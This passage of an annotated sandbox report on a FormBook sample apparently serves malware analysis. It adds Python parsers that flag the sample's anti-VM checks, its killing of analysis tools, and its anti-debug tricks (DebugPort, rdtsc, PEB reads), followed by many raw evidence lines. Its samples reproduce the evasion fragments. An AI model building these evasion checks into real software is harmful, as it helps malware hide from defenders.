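    # a string table), so they are only counted. Names inside calls count too.
    low = buf.lower()
    for name in sorted(VM_GUEST_TOOLS | ANALYSIS_TOOLS):
        n = low.count(name.encode())
        if n:
            found["mentions"][name] = n
    return found


def verdict(found: dict) -> list:
    """Map findings to ATT&CK-style reasons, most decisive first."""
    reasons = []
    if found["vm_checks"]:
        reasons.append("T1497.001 checks for VM guest tools: " + ", ".join(sorted(found["vm_checks"])))
    if found["disk_checks"]:
        reasons.append("T1497.001 free-space check: " + ", ".join(
            f"{d} < {m} MB" for d, m in sorted(found["disk_checks"])))
    if found["tool_kills"]:
        reasons.append("T1562.001 terminates analysis tools: " + ", ".join(sorted(found["tool_kills"])))
    if found["tool_checks"]:
        reasons.append("T1497.001 checks for analysis tools: " + ", ".join(sorted(found["tool_checks"])))
    if found["unknown_checks"]:
        reasons.append("ProcessExists on other names: " + ", ".join(sorted(found["unknown_checks"])))
    return reasons


# Constructed sample: fragments as they appear in the report, with the junk
# bytes that follow "Then" in several of the dumps and one bare name.
SAMPLE_DUMP = (
    b'If ProcessExists("VboxService.exe") ThenIM2ev\x00'
    b'If ProcessExists("VBoxTray.exe") Then{M\x00'
    b'If DriveSpaceFree("d:\\") < 1 And ProcessExists("VMwareService.exe") Then6QF\x00'
    b'If DriveSpaceFree("d:\\") < 1 And ProcessExists("VMwareUser.exe") Then@p\x00'
    b'IF PROCESSEXISTS("REGSHOT.EXE") THEN\x00PROCESSCLOSE("REGSHOT.EXE")\x00'
    b'PROCESSCLOSE("PROCESSHACKER.EXE")H\x00'
    b'\x90\x90VMwareUser.exe5FB536C7'
)

if __name__ == "__main__":
    for line in verdict(scan(SAMPLE_DUMP)):
        print(line)
```

                Run against a real .sdmp the same way (`scan(open(path, "rb").read())`); because the patterns are applied to raw bytes they also hit when the script text is embedded in an unrelated region, which is exactly where Joe Sandbox found it here.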
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | API call chain: ExitProcess graph end node (graph_0-28561)
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0146096E rdtsc
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00417D83 LdrLoadDll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EFF3FF BlockInput
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CB6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00E85D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
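                The evidence lines in this group are the injected FormBook payload's debugger checks: a DebugPort query (NtQueryInformationProcess with ProcessDebugPort), an rdtsc timing check, IsDebuggerPresent, BlockInput, a direct LdrLoadDll call that bypasses LoadLibrary hooks, and, in the long run of lines that follows, reads of fs:[00000030h], which on 32-bit Windows is TEB.ProcessEnvironmentBlock (PEB.BeingDebugged sits at offset 2 and PEB.NtGlobalFlag at 0x68). The report emits one line per instruction, so a single function appears many times. The parser below is an added example, not part of the report; it reads lines in the shape this report uses (both the flattened "...RegSvcs.exeCode function:" form and the " | Code function:" form), strips the trailing link residue, and aggregates hits per process, technique and function so that repeated PEB reads collapse into a count. It assumes that the leading number of a function id such as 14_2_0146096E is the report's process index (the same index as the 00000014 prefix of the .sdmp names) and that the hex tail is the function address; the technique names are this example's own. The sample lines are constructed from lines shown in this report.

```python
"""Aggregate anti-debug evidence from Joe Sandbox "Code function" lines.

Added example, not part of the report. Assumption: in an id like
14_2_0146096E the first field is the process index and the last is the
function address; the middle field is carried through unchanged.
"""
import re
from collections import defaultdict

_LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.*?)(?:\s*\|\s*)?"
    r"(?P<kind>Process information queried|Process queried|Code function):\s*"
    r"(?P<body>.*?)(?:Jump to behavior)?\s*$"
)
# "<id> <text> <id>" or "<id> <text>,<id>": the second id is link residue.
_FUNC_RE = re.compile(
    r"^(?P<id>\d+_\d+_[0-9A-Fa-f]{8})\s+(?P<text>.*?)(?:,?\s*(?P=id))?$"
)

# Ordered (technique, predicate) pairs; one line can hit several.
TECHNIQUES = [
    ("peb_read", lambda b: "fs:[00000030h]" in b),   # TEB->PEB: BeingDebugged / NtGlobalFlag
    ("rdtsc_timing", lambda b: re.search(r"\brdtsc\b", b) is not None),
    ("api_isdebugger", lambda b: "IsDebuggerPresent" in b),
    ("debugport_query", lambda b: "DebugPort" in b),
    ("input_block", lambda b: "BlockInput" in b),
    ("direct_ldr", lambda b: "LdrLoadDll" in b or "LdrGetProcedureAddress" in b),
]


def split_function(body: str):
    """Split '14_2_0146096E rdtsc 14_2_0146096E' into ('14_2_0146096E', 'rdtsc')."""
    m = _FUNC_RE.match(body)
    return (m["id"], m["text"]) if m else None


def classify(lines) -> dict:
    """Return {process: {technique: {function_id: hit_count}}}. Unknown lines are skipped."""
    out = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue
        proc = m["source"].rsplit("\\", 1)[-1]
        func_id, text = "-", m["body"]
        if m["kind"] == "Code function":
            parsed = split_function(text)
            if parsed is None:
                continue
            func_id, text = parsed
        for name, hit in TECHNIQUES:
            if hit(text):
                out[proc][name][func_id] += 1
    return {p: {t: dict(f) for t, f in techs.items()} for p, techs in out.items()}


def summarize(classified: dict) -> dict:
    """Return {process: {technique: (distinct_functions, total_hits)}}."""
    return {p: {t: (len(f), sum(f.values())) for t, f in techs.items()}
            for p, techs in classified.items()}


# Constructed sample: lines copied from this report, in both layouts.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146096E rdtsc 14_2_0146096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417D83 LdrLoadDll,14_2_00417D83
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFF3FF BlockInput,8_2_00EFF3FF
Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB6878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov ecx, dword ptr fs:[00000030h]14_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]14_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B8158 mov eax, dword ptr fs:[00000030h]14_2_014B8158
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00EFA488
""".strip().splitlines()

if __name__ == "__main__":
    for proc, techs in summarize(classify(SAMPLE_LINES)).items():
        print(proc, techs)
```

                Feeding the whole signature section through `classify()` gives, per process, how many distinct functions carry each check; a high PEB-read count spread over many functions in RegSvcs.exe is the injected payload, not the benign host binary, which is the distinction an analyst wants before pulling the function addresses into a disassembler.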
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CBECAA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EA5078 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01426154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01426154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F4164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F4164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01450124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0149E1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014F61E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014501F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01460185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014DC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014DC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01422050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0144C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0141C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014B6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A0E3 mov ecx, dword ptr fs:[00000030h]14_2_0141A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A60E0 mov eax, dword ptr fs:[00000030h]14_2_014A60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014280E9 mov eax, dword ptr fs:[00000030h]14_2_014280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C0F0 mov eax, dword ptr fs:[00000030h]14_2_0141C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014620F0 mov ecx, dword ptr fs:[00000030h]14_2_014620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142208A mov eax, dword ptr fs:[00000030h]14_2_0142208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014180A0 mov eax, dword ptr fs:[00000030h]14_2_014180A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B80A8 mov eax, dword ptr fs:[00000030h]14_2_014B80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E60B8 mov eax, dword ptr fs:[00000030h]14_2_014E60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E60B8 mov ecx, dword ptr fs:[00000030h]14_2_014E60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F634F mov eax, dword ptr fs:[00000030h]14_2_014F634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov ecx, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EA352 mov eax, dword ptr fs:[00000030h]14_2_014EA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C8350 mov ecx, dword ptr fs:[00000030h]14_2_014C8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C437C mov eax, dword ptr fs:[00000030h]14_2_014C437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A30B mov eax, dword ptr fs:[00000030h]14_2_0145A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A30B mov eax, dword ptr fs:[00000030h]14_2_0145A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A30B mov eax, dword ptr fs:[00000030h]14_2_0145A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C310 mov ecx, dword ptr fs:[00000030h]14_2_0141C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01440310 mov ecx, dword ptr fs:[00000030h]14_2_01440310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov eax, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov ecx, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov eax, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov eax, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DC3CD mov eax, dword ptr fs:[00000030h]14_2_014DC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A63C0 mov eax, dword ptr fs:[00000030h]14_2_014A63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov eax, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov eax, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov ecx, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov eax, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C43D4 mov eax, dword ptr fs:[00000030h]14_2_014C43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C43D4 mov eax, dword ptr fs:[00000030h]14_2_014C43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
